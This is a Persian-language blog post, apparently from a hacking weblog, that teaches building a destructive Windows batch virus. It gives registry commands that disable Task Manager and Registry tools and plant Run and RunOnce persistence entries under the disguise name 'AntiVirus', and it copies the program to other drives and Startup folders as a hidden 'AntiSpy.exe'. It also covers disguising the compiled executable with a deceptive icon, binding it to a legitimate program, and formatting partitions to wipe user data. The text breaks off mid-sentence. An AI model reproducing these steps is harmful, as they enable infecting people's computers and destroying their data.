تبلیغات
AnonyHackGod - ساخت خطرناک ترین ویروس

فونت زیبا سازفونت زیبا سازفونت زیبا سازفونت زیبا سازفونت زیبا سازفونت زیبا سازفونت زیبا ساز

لطفا از تمام مطالب دیدن فرمایید.
ویروس کلونر
(وحشتناک ترین ویروس)

خوب در اول ما باید یک فایل متنی ایجاد کنیم که از برنامه نت پد می شود استفاده کرد . سپس بعد نوشتن فرمان های مورد نظر فایل مذکور را با پسوند bat ذخیره می کنیم . در ادامه کار بوسیله برنامه Quick Batch File Compiler فایل مورد نظر را تبدیل به فایل اجرایی با پسوند exe می کنیم و یک آیسلامد هم برای فایل مشخص می کنیم تا ظاهری گول زننده داشته باشد. در نهایت هم این فایل می توانیم بوسیله برنامه EBundle به یک برنامه پیوست کنیم که در زمان اجرای برنامه مورد نظر کاربر فایل ما هم اجرا شده .
 فرمان ها : 1- با استفاده از دو فرمان زیر دو سرویس TaskManager و Registry بصورت غیر قابل استفاده برای کاربر خواهد شد. 
غیر فعال کردن TaskManager reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f غیر فعال کردن Registry reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f البته با تغییر مقدار از 1 به 0 کاربر می تواند از این دو سرویس استفاده کند.بعنوان مثال سیستم شما آلوده به ویروس شده و شما نمی توانید از این دو سرویس استفاده نمایید فقط کافی است یک فایل اجرا ساخته و این دو فرمان را در داخل آن قرار داده البته مقدار هر دو را برابر 0 قرار دهید بعد از اجرای فایل شما می توانید از این دو سرویس استفاده کنید. 2- در این قسمت تمام فایل های اجرای با پسوند exe از دایرکتوری جاری به درایو مورد نظر کپی می شود و در ادامه خصلیت فایل مورد نظر بصورت مخفی و فقط خواندنی تعریف می شود copy *.exe e: copy *.exe d: d: attrib  r  h AntiSpy.exe e: attrib  r  h AntiSpy.exe 3- در این قسمت هم آدرس فایل مورد نظر در رجیستری در قسمت Run تعریف می شود که در هر بار اجرا شدن ویندوز فایل مورد نظر اجرا شود . البته در اینجا من فقط آدرس فایل را از پارتیشن C تعریف کردم شما می توانید این کار را برای دیگر پارتیشن ها هم انجام دهید. reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionRun /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionRunOnce /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionRunServices /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionRunServicesOnce /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionRun /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionRunOnce /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f 4- در این مرحله باز فایل اجرای مورد نظر را از دایرکتوری جاری به داخل دایرکتوری startup ویندوز کپی می شود که باز با اجرا شدن ویندوز فایل مورد نظر ما اجرا شود.در اینجا فقط یه نکته لازم به ذکر است که باسد توجه نمایید به نحوه آدرس دادن به مسیر کپی شدن فایل. همونطور که میدانید در محیط داس نمی توان برای اسم یک فایل یا دایرکتوری بیش از 8 کارکتر در نظر گرفت . در صورتیکه اسم یک فایل یا دایرکتوری بیش از 8 کارکتر باشد در محیط داس شما نمی توانید اسم فایل یا دایرکتوری را بصورت کامل ببینید. اما اگر از فرمان cmd استفاده نماید برای دسترسی به محیط داس شما اسم فایل و دایرکتوری را بصورت کامل می بینید حتی اگر بیش از 8 کارکتر باشد. برای اینکه شما آدرس درست یک دایرکتوری را بدست آورید نیاز دارید که از فرمان command استفاده نمایید.
copy *.exe c:docume~1alluse~1startm~1programsstartup copy *.exe d:docume~1alluse~1startm~1programsstartup copy *.exe e:docume~1alluse~1startm~1programsstartup 5- در این قسمت با تغییر در فایل autoexec.bat و با استفاده از فرمان فرمت بعد از ریستارت سیستم و با اجرا شدن این فایل پارتیشن هایی که مشخص شده اند فرمت شده و اطلاعات کاربر پاک می شود. البته این به شرطی است که نوع فرمت پارتیشن ها بصورت FAT یا FAT32 باشد دصورتیکه NTFS 




تاریخ : سه شنبه 24 فروردین 1395 | 12:08 ب.ظ | نویسنده : متین جوشش | نظرات
لطفا از دیگر مطالب نیز دیدن فرمایید
.: Weblog Themes By SlideTheme :.


  • بی بی مارکت